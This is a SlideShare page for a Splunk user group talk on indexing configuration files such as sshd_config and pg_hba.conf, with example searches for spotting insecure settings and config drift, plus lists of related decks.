SlideShare a Scribd company logo

Splunking configfiles 20211208_daniel_wilson

B
Becky Burwell

Splunk SF Bay Area Usergroup meeting December 8, 2021: Splunking config files, presentation by Daniel Wilson

Data & Analytics
1 of 25
Download to read offline
Copyright © 2011, Splunk Inc. Listen to your data. 11/4/2021 Daniel Wilson Senior Security Engineer Splunk your Configs to Improve Security Posture
Copyright © 2011, Splunk Inc. Listen to your data. Agenda 2 • Introductions • What is a Config file? • Preparing Splunk • Use Cases • Gotcha’s • Q&A
Copyright © 2011, Splunk Inc. Listen to your data. Summary 3 A quick security talk to discuss how and why you would want to index your config files.
Copyright © 2011, Splunk Inc. Listen to your data. Introductions – Daniel Wilson 4 • Security? IT guy? Hey you? • Security more or less 8 years now • Selling computers in ’97 • Speaks randomly Splunk User Group • Formal Career and Skills development coach at StubHub/eBay through Leader a Coach program and Jr talent development Splunk Blogged About these features in 2007, that’s where I learned these tricks https://www.splunk.com/en_us/blog/tips-and-tricks/dont-forget-to-index-your-config-files.html
Copyright © 2011, Splunk Inc. Listen to your data. Introductions – Establish Credibility 5 40 Certs over the years….no idea what is expired • Splunk Arch level 2, Splunk Admin, Splunk Power User • AWS Security Specialist, MCSE Security, CCNA Sec, Security+, CySA+ • RHCSA, Cloud+, Linux+, CCNP Routing/Switching • MTA Software Development, MTA Python Other Stuffz • Active defense, Cloud Security, Network/Systems Security and Automation • CIS and MITRE • GDPR, PCI and SOX • DevOps Culture
Copyright © 2011, Splunk Inc. Listen to your data. Introduction Audience 6 • Who’s in the audience? – Splunk Admins – Security Folk – Auditors – ComplianceAuditors, Compliance
Copyright © 2011, Splunk Inc. Listen to your data. What is a Config File 7 • Flat file generally containing key values • Read by apps when they start/stop • Often contain critical settings • Example of a SSHD Config • “ini” files on Windows
Copyright © 2011, Splunk Inc. Listen to your data. Use Cases – Why Splunk? 8 • Monitoring your configs critical part of your File Integrity Monitoring Strategy (FIM) • Tools like AIDE tell you something changed • Auditd, tells you who changed and when • Both AIDE and Auditd lack content • GIT managed Configs are great… security professionals have been burned with lack of enforcement though.
Copyright © 2011, Splunk Inc. Listen to your data. Use Case – Looking at configs! 9 • Make easy to use dashboard for auditors and non-technical users • Tip: Rmcomments macro included to ease reading
Copyright © 2011, Splunk Inc. Listen to your data. Use Case – Comparing Config 10 • Compare files manually • Enrich your alerts with just the details index=configs source=/etc/ssh/sshd_config | head 2 | diff pos1=1 pos2=2
Copyright © 2011, Splunk Inc. Listen to your data. Use Case – Alert on Login Script Changes 11 • Actual control I implemented that later caught our internal RedTeam after getting p0wned. • Add a input for all your login scripts for your platform • Run this job every 15 minutes index=configs source="/home/*/.bash*"
Copyright © 2011, Splunk Inc. Listen to your data. Use Cases – Clear Text in Database 12 • Example of detecting of clear text passwords in PostGres • Note inline search extractions, will not extract by default • Tip: Add CIM fields like App to your results to improve searches index=configs sourcetype=config_file source=*pg_hba* " password" | dedup host, source | rex field=_raw "host.*(?<insecure>password)" | eval message = "Clear text passwords accepted by PostGres" | eval app = "Postgres" | table host, source, _raw, app
Copyright © 2011, Splunk Inc. Listen to your data. Use Case – SSHD Empty Passwords? 13 • Great Compliance Search right here, tweakable • Not you might want to script the input in here • Tip: Enrich your alerts with MITRE details index=configs sourcetype=config_file source=/etc/ssh/sshd_config earliest=-48h latest=now | dedup index, sourcetype, host, source | rex mode=sed "s/#PasswordAuthentication yes//g" | search "PermitEmptyPasswords yes" OR "PermitEmptyPasswords Yes" | eval vrisk_score = 100, domain="Endpoint", dest=host, dest_dns=host | eval reason="Endpoint - SSH PermitEmptyPasswords yes set" | eval MITRE="T1110" | eval _time = now() | table dest, vrisk_score, domain, reason, MITRE
Copyright © 2011, Splunk Inc. Listen to your data. Use Case – Config Drift 14 • By using md5 function we can see the drift • Consider sorting by your data gardens for compliance reports
Copyright © 2011, Splunk Inc. Listen to your data. Splunk Admin 15 • Splunk_TA_nix does all this • Props • Inputs • Indexes • I put all this in an app called TA-configsdemo on Splunkbase to help you play with these settings without dealing with Splunk_TA_nix
Copyright © 2011, Splunk Inc. Listen to your data. Splunk – Props.conf 16 • Rather than creating events, Splunk create one event per file • You can and should review your settings with btool • I noticed 4 settings in props.conf that are worthy conversations • Btool on your indexer and search head AUTO_KV_JSON = true CHECK_METHOD = modtime DATETIME_CONFIG = NONE KV_MODE = none $ ./splunk cmd btool props list config_file
Copyright © 2011, Splunk Inc. Listen to your data. Props - AUTO_KV_JSON 17 AUTO_KV_JSON = <boolean> * Used for search-time field extractions only. * Specifies whether to try json extraction automatically. * Default: true • Meaning if your file is well structured JSON you will get field extraction by default. • I used another sourcetype for this
Copyright © 2011, Splunk Inc. Listen to your data. Props - CHECK_METHOD = modtime 18 File checksum configuration * Set CHECK_METHOD to "endpoint_md5" to have Splunk software perform a checksum of the first and last 256 bytes of a file. When it finds matches, Splunk software lists the file as already indexed and indexes only new data, or ignores it if there is no new data. * Set CHECK_METHOD to "modtime" to check only the modification time of the file. • Super helpful on config files that are really small and don’t have enough characters to be checked with the first and last 256. Avoid the “too small problem” in Splunk sourcetypes.
Copyright © 2011, Splunk Inc. Listen to your data. Props - DATETIME_CONFIG = NONE 19 "NONE" leaves the event time set to whatever time was selected by the input layer * For data sent by Splunk forwarders over the Splunk-to-Splunk protocol, the input layer is the time that was selected on the forwarder by its input behavior (as below). * For file-based inputs (monitor, batch) the time chosen is the modification timestamp on the file being read. * For other inputs, the time chosen is the current system time when the event is read from the pipe/socket/etc. * Both "CURRENT" and "NONE" explicitly disable the per-text timestamp identification, so the default event boun • In this case a config_file time stamped by your operating system like in centOS might be dated 6-7 years ago. You need to consider this in your indexer retention strategy.
Copyright © 2011, Splunk Inc. Listen to your data. Props - KV_MODE = none 20 * none: if you want no field/value extraction to take place. • You will NOT get field extractions by default from your Config files • While a lot of your config_files are going to be key value they are going to be large and this is going to be expensive to turn on.
Copyright © 2011, Splunk Inc. Listen to your data. inputs.conf 21 [monitor:///etc/ssh/sshd_conf*] index=configs sourcetype=config_file If you have Splunk_TA_Nix installed or configured your props.conf as we mentioned the source will work.
Copyright © 2011, Splunk Inc. Listen to your data. inputs.conf, cont 22 • Trick to cat a file in • Time will be NOW • Saved our auditor days • MD5 identical • Make sure the file is there! … do-execcat() { # display config if [ -f "$strConfigLocation" ]; then cat $strConfigLocation fi } … [script://./bin/cat_sshd_config.sh] index=osnixvcustom sourcetype=config_file source=/etc/ssh/sshd_config interval=86400
Copyright © 2011, Splunk Inc. Listen to your data. Indexer Stuff 23 • Very low sourcetype uniformity • Don’t recommend you mix it with other types for this reason • Ideally not a default index you would search either due to a large set of characters and strings vs a traditional log
Copyright © 2011, Splunk Inc. Listen to your data. Gotcha’s 24 • Config files are cheap • Watch out for shared file systems • Ensure your index permissions are well managed • Don’t index any secrets you don’t want collected
Copyright © 2011, Splunk Inc. Listen to your data. Thank You :)

Recommended

Getting Started with Splunk Breakout Session
Getting Started with Splunk Breakout SessionGetting Started with Splunk Breakout Session
Getting Started with Splunk Breakout SessionSplunk
 
October 2014 Webinar: Cybersecurity Threat Detection
October 2014 Webinar: Cybersecurity Threat DetectionOctober 2014 Webinar: Cybersecurity Threat Detection
October 2014 Webinar: Cybersecurity Threat DetectionSqrrl
 
Workshop splunk 6.5-saint-louis-mo
Workshop splunk 6.5-saint-louis-moWorkshop splunk 6.5-saint-louis-mo
Workshop splunk 6.5-saint-louis-moMohamad Hassan
 
Leveraging DNS to Surface Attacker Activity
Leveraging DNS to Surface Attacker ActivityLeveraging DNS to Surface Attacker Activity
Leveraging DNS to Surface Attacker ActivitySqrrl
 
Splunk workshop-Machine Data 101
Splunk workshop-Machine Data 101Splunk workshop-Machine Data 101
Splunk workshop-Machine Data 101Splunk
 
Advanced Splunk Administration
Advanced Splunk AdministrationAdvanced Splunk Administration
Advanced Splunk AdministrationGreg Hanchin
 
Daten anonymisieren und pseudonymisieren in Splunk Enterprise
Daten anonymisieren und pseudonymisieren in Splunk EnterpriseDaten anonymisieren und pseudonymisieren in Splunk Enterprise
Daten anonymisieren und pseudonymisieren in Splunk Enterprisejenny_splunk
 
Getting started with Splunk - Break out Session
Getting started with Splunk - Break out SessionGetting started with Splunk - Break out Session
Getting started with Splunk - Break out SessionGeorg Knon
 

Recommended

Getting Started with Splunk Breakout Session
Getting Started with Splunk Breakout SessionGetting Started with Splunk Breakout Session
Getting Started with Splunk Breakout SessionSplunk
 
October 2014 Webinar: Cybersecurity Threat Detection
October 2014 Webinar: Cybersecurity Threat DetectionOctober 2014 Webinar: Cybersecurity Threat Detection
October 2014 Webinar: Cybersecurity Threat DetectionSqrrl
 
Workshop splunk 6.5-saint-louis-mo
Workshop splunk 6.5-saint-louis-moWorkshop splunk 6.5-saint-louis-mo
Workshop splunk 6.5-saint-louis-moMohamad Hassan
 
Leveraging DNS to Surface Attacker Activity
Leveraging DNS to Surface Attacker ActivityLeveraging DNS to Surface Attacker Activity
Leveraging DNS to Surface Attacker ActivitySqrrl
 
Splunk workshop-Machine Data 101
Splunk workshop-Machine Data 101Splunk workshop-Machine Data 101
Splunk workshop-Machine Data 101Splunk
 
Advanced Splunk Administration
Advanced Splunk AdministrationAdvanced Splunk Administration
Advanced Splunk AdministrationGreg Hanchin
 
Daten anonymisieren und pseudonymisieren in Splunk Enterprise
Daten anonymisieren und pseudonymisieren in Splunk EnterpriseDaten anonymisieren und pseudonymisieren in Splunk Enterprise
Daten anonymisieren und pseudonymisieren in Splunk Enterprisejenny_splunk
 
Getting started with Splunk - Break out Session
Getting started with Splunk - Break out SessionGetting started with Splunk - Break out Session
Getting started with Splunk - Break out SessionGeorg Knon
 
SplunkLive! Getting Started with Splunk Enterprise
SplunkLive! Getting Started with Splunk EnterpriseSplunkLive! Getting Started with Splunk Enterprise
SplunkLive! Getting Started with Splunk EnterpriseSplunk
 
Apache Spot
Apache SpotApache Spot
Apache SpotAustin Leahy
 
Deep Learning in Security—An Empirical Example in User and Entity Behavior An...
Deep Learning in Security—An Empirical Example in User and Entity Behavior An...Deep Learning in Security—An Empirical Example in User and Entity Behavior An...
Deep Learning in Security—An Empirical Example in User and Entity Behavior An...Databricks
 
Splunk Discovery: Warsaw 2018 - Getting Data In
Splunk Discovery: Warsaw 2018 - Getting Data InSplunk Discovery: Warsaw 2018 - Getting Data In
Splunk Discovery: Warsaw 2018 - Getting Data InSplunk
 
Fighting cybersecurity threats with Apache Spot
Fighting cybersecurity threats with Apache SpotFighting cybersecurity threats with Apache Spot
Fighting cybersecurity threats with Apache Spotmarkgrover
 
NUTANIX and SPLUNK
NUTANIX and SPLUNKNUTANIX and SPLUNK
NUTANIX and SPLUNKGreg Hanchin
 
Splunk Data Onboarding Overview - Splunk Data Collection Architecture
Splunk Data Onboarding Overview - Splunk Data Collection ArchitectureSplunk Data Onboarding Overview - Splunk Data Collection Architecture
Splunk Data Onboarding Overview - Splunk Data Collection ArchitectureSplunk
 
Machine Data 101
Machine Data 101Machine Data 101
Machine Data 101Splunk
 
Analyzing 1.2 Million Network Packets per Second in Real-time
Analyzing 1.2 Million Network Packets per Second in Real-timeAnalyzing 1.2 Million Network Packets per Second in Real-time
Analyzing 1.2 Million Network Packets per Second in Real-timeDataWorks Summit
 
Machine Data 101: Turning Data Into Insight
Machine Data 101: Turning Data Into InsightMachine Data 101: Turning Data Into Insight
Machine Data 101: Turning Data Into InsightSplunk
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Splunk live beginner training nyc
Splunk live beginner training nycSplunk live beginner training nyc
Splunk live beginner training nycDimitri McKay - CISSP
 
SplunkLive 2011 Beginners Session
SplunkLive 2011 Beginners SessionSplunkLive 2011 Beginners Session
SplunkLive 2011 Beginners SessionSplunk
 
Getting Started with Splunk Enterprise
Getting Started with Splunk EnterpriseGetting Started with Splunk Enterprise
Getting Started with Splunk EnterpriseShannon Cuthbertson
 
Advanced Use Cases for Analytics Breakout Session
Advanced Use Cases for Analytics Breakout SessionAdvanced Use Cases for Analytics Breakout Session
Advanced Use Cases for Analytics Breakout SessionSplunk
 
Data Onboarding Breakout Session
Data Onboarding Breakout SessionData Onboarding Breakout Session
Data Onboarding Breakout SessionSplunk
 
SplunkLive! Customer Presentation - Penn State Hershey Medical Center
SplunkLive! Customer Presentation - Penn State Hershey Medical CenterSplunkLive! Customer Presentation - Penn State Hershey Medical Center
SplunkLive! Customer Presentation - Penn State Hershey Medical CenterSplunk
 
What's Next for Google's BigTable
What's Next for Google's BigTableWhat's Next for Google's BigTable
What's Next for Google's BigTableSqrrl
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information SecurityShannon Cuthbertson
 
Get full visibility and find hidden security issues
Get full visibility and find hidden security issuesGet full visibility and find hidden security issues
Get full visibility and find hidden security issuesElasticsearch
 
dlux splunk>live! 2012 Beginners Session
dlux splunk>live! 2012 Beginners Sessiondlux splunk>live! 2012 Beginners Session
dlux splunk>live! 2012 Beginners SessionDavid Lutz
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidMatthew Johnson
 

More Related Content

What's hot

SplunkLive! Getting Started with Splunk Enterprise
SplunkLive! Getting Started with Splunk EnterpriseSplunkLive! Getting Started with Splunk Enterprise
SplunkLive! Getting Started with Splunk EnterpriseSplunk
 
Deep Learning in Security—An Empirical Example in User and Entity Behavior An...
Deep Learning in Security—An Empirical Example in User and Entity Behavior An...Deep Learning in Security—An Empirical Example in User and Entity Behavior An...
Deep Learning in Security—An Empirical Example in User and Entity Behavior An...Databricks
 
Splunk Discovery: Warsaw 2018 - Getting Data In
Splunk Discovery: Warsaw 2018 - Getting Data InSplunk Discovery: Warsaw 2018 - Getting Data In
Splunk Discovery: Warsaw 2018 - Getting Data InSplunk
 
Fighting cybersecurity threats with Apache Spot
Fighting cybersecurity threats with Apache SpotFighting cybersecurity threats with Apache Spot
Fighting cybersecurity threats with Apache Spotmarkgrover
 
NUTANIX and SPLUNK
NUTANIX and SPLUNKNUTANIX and SPLUNK
NUTANIX and SPLUNKGreg Hanchin
 
Splunk Data Onboarding Overview - Splunk Data Collection Architecture
Splunk Data Onboarding Overview - Splunk Data Collection ArchitectureSplunk Data Onboarding Overview - Splunk Data Collection Architecture
Splunk Data Onboarding Overview - Splunk Data Collection ArchitectureSplunk
 
Machine Data 101
Machine Data 101Machine Data 101
Machine Data 101Splunk
 
Analyzing 1.2 Million Network Packets per Second in Real-time
Analyzing 1.2 Million Network Packets per Second in Real-timeAnalyzing 1.2 Million Network Packets per Second in Real-time
Analyzing 1.2 Million Network Packets per Second in Real-timeDataWorks Summit
 
Machine Data 101: Turning Data Into Insight
Machine Data 101: Turning Data Into InsightMachine Data 101: Turning Data Into Insight
Machine Data 101: Turning Data Into InsightSplunk
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
SplunkLive 2011 Beginners Session
SplunkLive 2011 Beginners SessionSplunkLive 2011 Beginners Session
SplunkLive 2011 Beginners SessionSplunk
 
Getting Started with Splunk Enterprise
Getting Started with Splunk EnterpriseGetting Started with Splunk Enterprise
Getting Started with Splunk EnterpriseShannon Cuthbertson
 
Advanced Use Cases for Analytics Breakout Session
Advanced Use Cases for Analytics Breakout SessionAdvanced Use Cases for Analytics Breakout Session
Advanced Use Cases for Analytics Breakout SessionSplunk
 
Data Onboarding Breakout Session
Data Onboarding Breakout SessionData Onboarding Breakout Session
Data Onboarding Breakout SessionSplunk
 
SplunkLive! Customer Presentation - Penn State Hershey Medical Center
SplunkLive! Customer Presentation - Penn State Hershey Medical CenterSplunkLive! Customer Presentation - Penn State Hershey Medical Center
SplunkLive! Customer Presentation - Penn State Hershey Medical CenterSplunk
 
What's Next for Google's BigTable
What's Next for Google's BigTableWhat's Next for Google's BigTable
What's Next for Google's BigTableSqrrl
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information SecurityShannon Cuthbertson
 
Get full visibility and find hidden security issues
Get full visibility and find hidden security issuesGet full visibility and find hidden security issues
Get full visibility and find hidden security issuesElasticsearch
 

What's hot (20)

SplunkLive! Getting Started with Splunk Enterprise
SplunkLive! Getting Started with Splunk EnterpriseSplunkLive! Getting Started with Splunk Enterprise
SplunkLive! Getting Started with Splunk Enterprise
 
Apache Spot
Apache SpotApache Spot
Apache Spot
 
Deep Learning in Security—An Empirical Example in User and Entity Behavior An...
Deep Learning in Security—An Empirical Example in User and Entity Behavior An...Deep Learning in Security—An Empirical Example in User and Entity Behavior An...
Deep Learning in Security—An Empirical Example in User and Entity Behavior An...
 
Splunk Discovery: Warsaw 2018 - Getting Data In
Splunk Discovery: Warsaw 2018 - Getting Data InSplunk Discovery: Warsaw 2018 - Getting Data In
Splunk Discovery: Warsaw 2018 - Getting Data In
 
Fighting cybersecurity threats with Apache Spot
Fighting cybersecurity threats with Apache SpotFighting cybersecurity threats with Apache Spot
Fighting cybersecurity threats with Apache Spot
 
NUTANIX and SPLUNK
NUTANIX and SPLUNKNUTANIX and SPLUNK
NUTANIX and SPLUNK
 
Splunk Data Onboarding Overview - Splunk Data Collection Architecture
Splunk Data Onboarding Overview - Splunk Data Collection ArchitectureSplunk Data Onboarding Overview - Splunk Data Collection Architecture
Splunk Data Onboarding Overview - Splunk Data Collection Architecture
 
Machine Data 101
Machine Data 101Machine Data 101
Machine Data 101
 
Analyzing 1.2 Million Network Packets per Second in Real-time
Analyzing 1.2 Million Network Packets per Second in Real-timeAnalyzing 1.2 Million Network Packets per Second in Real-time
Analyzing 1.2 Million Network Packets per Second in Real-time
 
Machine Data 101: Turning Data Into Insight
Machine Data 101: Turning Data Into InsightMachine Data 101: Turning Data Into Insight
Machine Data 101: Turning Data Into Insight
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
Splunk live beginner training nyc
Splunk live beginner training nycSplunk live beginner training nyc
Splunk live beginner training nyc
 
SplunkLive 2011 Beginners Session
SplunkLive 2011 Beginners SessionSplunkLive 2011 Beginners Session
SplunkLive 2011 Beginners Session
 
Getting Started with Splunk Enterprise
Getting Started with Splunk EnterpriseGetting Started with Splunk Enterprise
Getting Started with Splunk Enterprise
 
Advanced Use Cases for Analytics Breakout Session
Advanced Use Cases for Analytics Breakout SessionAdvanced Use Cases for Analytics Breakout Session
Advanced Use Cases for Analytics Breakout Session
 
Data Onboarding Breakout Session
Data Onboarding Breakout SessionData Onboarding Breakout Session
Data Onboarding Breakout Session
 
SplunkLive! Customer Presentation - Penn State Hershey Medical Center
SplunkLive! Customer Presentation - Penn State Hershey Medical CenterSplunkLive! Customer Presentation - Penn State Hershey Medical Center
SplunkLive! Customer Presentation - Penn State Hershey Medical Center
 
What's Next for Google's BigTable
What's Next for Google's BigTableWhat's Next for Google's BigTable
What's Next for Google's BigTable
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information Security
 
Get full visibility and find hidden security issues
Get full visibility and find hidden security issuesGet full visibility and find hidden security issues
Get full visibility and find hidden security issues
 

Similar to Splunking configfiles 20211208_daniel_wilson

dlux splunk>live! 2012 Beginners Session
dlux splunk>live! 2012 Beginners Sessiondlux splunk>live! 2012 Beginners Session
dlux splunk>live! 2012 Beginners SessionDavid Lutz
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidMatthew Johnson
 
Apache HDFS Extended Attributes and Transparent Encryption
Apache HDFS Extended Attributes and Transparent EncryptionApache HDFS Extended Attributes and Transparent Encryption
Apache HDFS Extended Attributes and Transparent EncryptionUma Maheswara Rao Gangumalla
 
Getting Started with Splunk Enterprise Hands-On Breakout Session
Getting Started with Splunk Enterprise Hands-On Breakout SessionGetting Started with Splunk Enterprise Hands-On Breakout Session
Getting Started with Splunk Enterprise Hands-On Breakout SessionSplunk
 
Leveraging Structured Data To Reduce Disk, IO & Network Bandwidth
Leveraging Structured Data To Reduce Disk, IO & Network BandwidthLeveraging Structured Data To Reduce Disk, IO & Network Bandwidth
Leveraging Structured Data To Reduce Disk, IO & Network BandwidthPerforce
 
Cloud patterns applied
Cloud patterns appliedCloud patterns applied
Cloud patterns appliedLars Fronius
 
EnCase Enterprise Basic File Collection
EnCase Enterprise Basic File Collection EnCase Enterprise Basic File Collection
EnCase Enterprise Basic File Collection Damir Delija
 
Setup of EDA tools and workstation environment variables in NCTU 307 Lab. wor...
Setup of EDA tools and workstation environment variables in NCTU 307 Lab. wor...Setup of EDA tools and workstation environment variables in NCTU 307 Lab. wor...
Setup of EDA tools and workstation environment variables in NCTU 307 Lab. wor...Michael Lee
 
Mainframe Customer Education Webcast: New Ironstream Facilities for Enhanced ...
Mainframe Customer Education Webcast: New Ironstream Facilities for Enhanced ...Mainframe Customer Education Webcast: New Ironstream Facilities for Enhanced ...
Mainframe Customer Education Webcast: New Ironstream Facilities for Enhanced ...Precisely
 
How to Make a Honeypot Stickier (SSH*)
How to Make a Honeypot Stickier (SSH*)How to Make a Honeypot Stickier (SSH*)
How to Make a Honeypot Stickier (SSH*)Jose Hernandez
 
DevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopDevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopMandi Walls
 
DCRUG: Achieving Development-Production Parity
DCRUG: Achieving Development-Production ParityDCRUG: Achieving Development-Production Parity
DCRUG: Achieving Development-Production ParityGeoff Harcourt
 
How to Make a Honeypot Stickier (SSH*)
How to Make a Honeypot Stickier (SSH*)How to Make a Honeypot Stickier (SSH*)
How to Make a Honeypot Stickier (SSH*)Jose Hernandez
 
InSpec For DevOpsDays Amsterdam 2017
InSpec For DevOpsDays Amsterdam 2017InSpec For DevOpsDays Amsterdam 2017
InSpec For DevOpsDays Amsterdam 2017Mandi Walls
 
The latest, ultimative final ver­sion, current release, approved, last minute...
The latest, ultimative final ver­sion, current release, approved, last minute...The latest, ultimative final ver­sion, current release, approved, last minute...
The latest, ultimative final ver­sion, current release, approved, last minute...Martin Leyrer
 
The Latest, Ultimative Final Version, Current Release, Approved, Last Minute ...
The Latest, Ultimative Final Version, Current Release, Approved, Last Minute ...The Latest, Ultimative Final Version, Current Release, Approved, Last Minute ...
The Latest, Ultimative Final Version, Current Release, Approved, Last Minute ...LetsConnect
 
Windows 8 Forensics & Anti Forensics
Windows 8 Forensics & Anti ForensicsWindows 8 Forensics & Anti Forensics
Windows 8 Forensics & Anti ForensicsMike Spaulding
 
Splunk best practices
Splunk best practicesSplunk best practices
Splunk best practicesJilali HARITI
 
SplunkLive! Customer Presentation – athenahealth
SplunkLive! Customer Presentation – athenahealthSplunkLive! Customer Presentation – athenahealth
SplunkLive! Customer Presentation – athenahealthStephanie Bies
 

Similar to Splunking configfiles 20211208_daniel_wilson (20)

dlux splunk>live! 2012 Beginners Session
dlux splunk>live! 2012 Beginners Sessiondlux splunk>live! 2012 Beginners Session
dlux splunk>live! 2012 Beginners Session
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue Kid
 
Apache HDFS Extended Attributes and Transparent Encryption
Apache HDFS Extended Attributes and Transparent EncryptionApache HDFS Extended Attributes and Transparent Encryption
Apache HDFS Extended Attributes and Transparent Encryption
 
Splunk Insights
Splunk InsightsSplunk Insights
Splunk Insights
 
Getting Started with Splunk Enterprise Hands-On Breakout Session
Getting Started with Splunk Enterprise Hands-On Breakout SessionGetting Started with Splunk Enterprise Hands-On Breakout Session
Getting Started with Splunk Enterprise Hands-On Breakout Session
 
Leveraging Structured Data To Reduce Disk, IO & Network Bandwidth
Leveraging Structured Data To Reduce Disk, IO & Network BandwidthLeveraging Structured Data To Reduce Disk, IO & Network Bandwidth
Leveraging Structured Data To Reduce Disk, IO & Network Bandwidth
 
Cloud patterns applied
Cloud patterns appliedCloud patterns applied
Cloud patterns applied
 
EnCase Enterprise Basic File Collection
EnCase Enterprise Basic File Collection EnCase Enterprise Basic File Collection
EnCase Enterprise Basic File Collection
 
Setup of EDA tools and workstation environment variables in NCTU 307 Lab. wor...
Setup of EDA tools and workstation environment variables in NCTU 307 Lab. wor...Setup of EDA tools and workstation environment variables in NCTU 307 Lab. wor...
Setup of EDA tools and workstation environment variables in NCTU 307 Lab. wor...
 
Mainframe Customer Education Webcast: New Ironstream Facilities for Enhanced ...
Mainframe Customer Education Webcast: New Ironstream Facilities for Enhanced ...Mainframe Customer Education Webcast: New Ironstream Facilities for Enhanced ...
Mainframe Customer Education Webcast: New Ironstream Facilities for Enhanced ...
 
How to Make a Honeypot Stickier (SSH*)
How to Make a Honeypot Stickier (SSH*)How to Make a Honeypot Stickier (SSH*)
How to Make a Honeypot Stickier (SSH*)
 
DevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopDevOpsDays InSpec Workshop
DevOpsDays InSpec Workshop
 
DCRUG: Achieving Development-Production Parity
DCRUG: Achieving Development-Production ParityDCRUG: Achieving Development-Production Parity
DCRUG: Achieving Development-Production Parity
 
How to Make a Honeypot Stickier (SSH*)
How to Make a Honeypot Stickier (SSH*)How to Make a Honeypot Stickier (SSH*)
How to Make a Honeypot Stickier (SSH*)
 
InSpec For DevOpsDays Amsterdam 2017
InSpec For DevOpsDays Amsterdam 2017InSpec For DevOpsDays Amsterdam 2017
InSpec For DevOpsDays Amsterdam 2017
 
The latest, ultimative final ver­sion, current release, approved, last minute...
The latest, ultimative final ver­sion, current release, approved, last minute...The latest, ultimative final ver­sion, current release, approved, last minute...
The latest, ultimative final ver­sion, current release, approved, last minute...
 
The Latest, Ultimative Final Version, Current Release, Approved, Last Minute ...
The Latest, Ultimative Final Version, Current Release, Approved, Last Minute ...The Latest, Ultimative Final Version, Current Release, Approved, Last Minute ...
The Latest, Ultimative Final Version, Current Release, Approved, Last Minute ...
 
Windows 8 Forensics & Anti Forensics
Windows 8 Forensics & Anti ForensicsWindows 8 Forensics & Anti Forensics
Windows 8 Forensics & Anti Forensics
 
Splunk best practices
Splunk best practicesSplunk best practices
Splunk best practices
 
SplunkLive! Customer Presentation – athenahealth
SplunkLive! Customer Presentation – athenahealthSplunkLive! Customer Presentation – athenahealth
SplunkLive! Customer Presentation – athenahealth
 

More from Becky Burwell

SFBA Splunk Usergroup meeting March 13, 2024
SFBA Splunk Usergroup meeting March 13, 2024SFBA Splunk Usergroup meeting March 13, 2024
SFBA Splunk Usergroup meeting March 13, 2024Becky Burwell
 
SFBA Splunk Usergroup meeting December 14, 2023
SFBA Splunk Usergroup meeting December 14, 2023SFBA Splunk Usergroup meeting December 14, 2023
SFBA Splunk Usergroup meeting December 14, 2023Becky Burwell
 
SFBA_SUG_2023-08-02.pdf
SFBA_SUG_2023-08-02.pdfSFBA_SUG_2023-08-02.pdf
SFBA_SUG_2023-08-02.pdfBecky Burwell
 
SFBA Splunk Usergroup meeting May 3, 2023
SFBA Splunk Usergroup meeting May 3, 2023SFBA Splunk Usergroup meeting May 3, 2023
SFBA Splunk Usergroup meeting May 3, 2023Becky Burwell
 
SFBA Splunk User Group Meeting February 2023
SFBA Splunk User Group Meeting February 2023SFBA Splunk User Group Meeting February 2023
SFBA Splunk User Group Meeting February 2023Becky Burwell
 
SFBA Splunk Usergroup meeting December 2022
SFBA Splunk Usergroup meeting December 2022SFBA Splunk Usergroup meeting December 2022
SFBA Splunk Usergroup meeting December 2022Becky Burwell
 
SFBA Usergroup meeting November 2, 2022
SFBA Usergroup meeting November 2, 2022SFBA Usergroup meeting November 2, 2022
SFBA Usergroup meeting November 2, 2022Becky Burwell
 
SF Bay Area Splunk User Group Meeting October 5, 2022
SF Bay Area Splunk User Group Meeting October 5, 2022SF Bay Area Splunk User Group Meeting October 5, 2022
SF Bay Area Splunk User Group Meeting October 5, 2022Becky Burwell
 
SFBA Splunk User Group Meeting August 10, 2022
SFBA Splunk User Group Meeting August 10, 2022SFBA Splunk User Group Meeting August 10, 2022
SFBA Splunk User Group Meeting August 10, 2022Becky Burwell
 
SFBA Splunk Usergroup meeting July 13, 2022
SFBA Splunk Usergroup meeting July 13, 2022SFBA Splunk Usergroup meeting July 13, 2022
SFBA Splunk Usergroup meeting July 13, 2022Becky Burwell
 
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdfdesigning-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdfBecky Burwell
 
Getting Started with Splunk Observability September 8, 2021
Getting Started with Splunk Observability September 8, 2021Getting Started with Splunk Observability September 8, 2021
Getting Started with Splunk Observability September 8, 2021Becky Burwell
 
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...Becky Burwell
 

More from Becky Burwell (13)

SFBA Splunk Usergroup meeting March 13, 2024
SFBA Splunk Usergroup meeting March 13, 2024SFBA Splunk Usergroup meeting March 13, 2024
SFBA Splunk Usergroup meeting March 13, 2024
 
SFBA Splunk Usergroup meeting December 14, 2023
SFBA Splunk Usergroup meeting December 14, 2023SFBA Splunk Usergroup meeting December 14, 2023
SFBA Splunk Usergroup meeting December 14, 2023
 
SFBA_SUG_2023-08-02.pdf
SFBA_SUG_2023-08-02.pdfSFBA_SUG_2023-08-02.pdf
SFBA_SUG_2023-08-02.pdf
 
SFBA Splunk Usergroup meeting May 3, 2023
SFBA Splunk Usergroup meeting May 3, 2023SFBA Splunk Usergroup meeting May 3, 2023
